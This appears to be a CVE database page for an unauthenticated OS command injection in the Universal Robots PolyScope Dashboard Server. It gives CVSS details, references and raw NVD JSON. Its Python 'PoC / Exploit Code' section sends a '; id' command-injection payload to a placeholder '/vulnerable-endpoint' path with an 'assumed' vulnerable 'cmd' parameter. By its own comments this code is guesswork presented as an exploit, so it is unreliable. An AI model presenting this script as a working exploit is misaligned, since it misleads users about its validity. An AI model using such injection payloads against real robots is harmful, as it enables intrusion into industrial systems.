CVE-2026-8153

Description

OS command injection in Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows unauthenticated attacker to craft commands that will execute code on the robot's OS.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Universal Robots PolyScope < 5.25.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-8153
import requests
import sys

def exploit(target_ip):
    # Targeting the Dashboard Server interface
    # Note: The specific vulnerable endpoint might vary based on configuration
    url = f"http://{target_ip}:29999/vulnerable-endpoint"
    
    # Payload to execute a simple command (e.g., id)
    # Assuming the 'cmd' parameter is vulnerable to injection
    injection_payload = "; id" 
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.get(url, params={"cmd": injection_payload}, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for command execution output.")
            print(response.text)
        else:
            print("[-] Exploit request failed.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
    else:
        exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8153
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8153
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8153/
[4] VulDB https://vuldb.com/cve/CVE-2026-8153
[5] https://www.universal-robots.com/developer/communication-protocol/dashboard-server/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8153", "sourceIdentifier": "1b7e193f-2525-49a1-b171-84af8827c9eb", "published": "2026-05-08T12:16:29.977", "lastModified": "2026-05-11T10:16:15.380", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS command injection in Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows unauthenticated attacker to craft commands that will execute code on the robot's OS."}], "metrics": {"cvssMetricV31": [{"source": "1b7e193f-2525-49a1-b171-84af8827c9eb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "1b7e193f-2525-49a1-b171-84af8827c9eb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.universal-robots.com/developer/communication-protocol/dashboard-server/", "source": "1b7e193f-2525-49a1-b171-84af8827c9eb"}]}}